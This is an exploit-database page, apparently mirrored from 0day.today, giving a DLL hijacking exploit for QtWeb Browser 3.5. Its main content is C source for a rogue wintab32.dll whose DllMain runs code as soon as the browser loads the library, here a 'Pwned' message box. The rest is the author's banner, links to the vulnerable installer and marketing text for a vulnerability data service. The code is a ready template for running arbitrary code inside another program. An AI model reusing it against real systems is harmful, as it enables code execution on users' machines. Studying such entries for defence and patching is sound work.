Lucene search
K

Qtweb Browser v3.5 DLL Hijacking Exploit

🗓️ 16 Jan 2010 00:00:00Reported by PoisonCodeType 
zdt
 zdt
🔗 0day.today👁 15 Views

Qtweb Browser v3.5 DLL Hijacking Exploit, Pwned by PoisonCode-PanamaSecurit

Code
========================================
Qtweb Browser v3.5 DLL Hijacking Exploit
========================================

# Title: Qtweb Browser v3.5  DLL Hijacking Exploit(wintab32.dll)
# Software:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable Software:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.5
# Tested on: Windows
# Author: PoisonCode
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2018-02-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation